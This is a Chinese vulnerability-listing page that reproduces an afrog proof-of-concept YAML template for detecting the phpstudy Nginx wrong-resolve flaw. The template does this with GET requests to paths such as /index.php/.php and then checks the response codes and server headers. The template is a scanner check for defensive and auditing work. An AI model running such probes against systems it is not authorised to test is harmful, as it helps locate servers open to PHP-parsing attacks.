phpstudy-nginx-wrong-resolve: Phpstudy Nginx Wrong Resolve

日期: 2025-09-01 | 影响软件: phpstudy nginx | POC: 已公开

漏洞描述

Phpstudy Nginx Wrong Resolve

PoC代码[已公开]

id: phpstudy-nginx-wrong-resolve

info:
  name: Phpstudy Nginx Wrong Resolve
  author: zan8in
  severity: high
  verified: true
  description: Phpstudy Nginx Wrong Resolve
  reference:
    - https://mp.weixin.qq.com/s/ILTuWnkzQAw0Q5-vMU3g1g
    - https://www.seebug.org/vuldb/ssvid-98364
  tags: phpstudy,nginx,wrong,resolve
  created: 2024/07/18

set:
  name: randomInt(10000000, 99999999)
rules:
  r0:
    request:
      method: GET
      path: /{{name}}.php
    expression: response.status != 200
  r1:
    request:
      method: GET
      path: /index.php
    expression: response.status == 200 && response.headers["server"].contains("nginx")
  r2:
    request:
      method: GET
      path: /index.php/.php
    expression: response.status == 200 && response.headers["server"].contains("nginx")
  r3:
    request:
      method: GET
      path: /index.php/.xxx
    expression: response.status != 200
  r00:
    request:
      method: GET
      path: /{{name}}.php
    expression: response.status != 200
  r01:
    request:
      method: GET
      path: /index.html
    expression: response.status == 200 && response.headers["server"].contains("nginx")
  r02:
    request:
      method: GET
      path: /index.html/.php
    expression: response.status == 200 && response.headers["server"].contains("nginx")
  r03:
    request:
      method: GET
      path: /index.html/.xxx
    expression: response.status != 200
expression: (r0() && r1() && r2() && r3()) || (r00() && r01() && r02() && r03())
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/phpstudy-nginx-wrong-resolve.yaml

相关漏洞推荐